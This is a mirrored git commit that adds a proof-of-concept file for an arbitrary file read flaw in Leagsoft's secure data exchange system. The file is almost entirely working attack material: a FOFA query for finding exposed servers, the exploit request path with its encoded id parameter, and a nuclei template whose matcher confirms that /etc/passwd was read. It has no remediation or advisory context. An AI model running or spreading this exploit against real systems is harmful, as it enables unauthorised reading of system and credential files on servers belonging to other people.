mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 联软安全数据交换系统任意文件读取.md
This commit is contained in:
parent
a99c83248d
commit
b929fd9945
41
联软安全数据交换系统任意文件读取.md
Normal file
41
联软安全数据交换系统任意文件读取.md
Normal file
@ -0,0 +1,41 @@
|
|||||||
|
## 联软安全数据交换系统任意文件读取
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
body="UniExServices"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=
|
||||||
|
```
|
||||||
|
|
||||||
|
## nuclei
|
||||||
|
```
|
||||||
|
id: leagsoft-safedata-exchange-file-fileread
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: 联软安全数据交换系统任意文件读取
|
||||||
|
author: mmy
|
||||||
|
severity: high
|
||||||
|
tags: leagsoft,fileread
|
||||||
|
description: 联软安全数据交换系统任意文件读取
|
||||||
|
reference:
|
||||||
|
-
|
||||||
|
metadata:
|
||||||
|
fofa-query: 'body="UniExServices"'
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user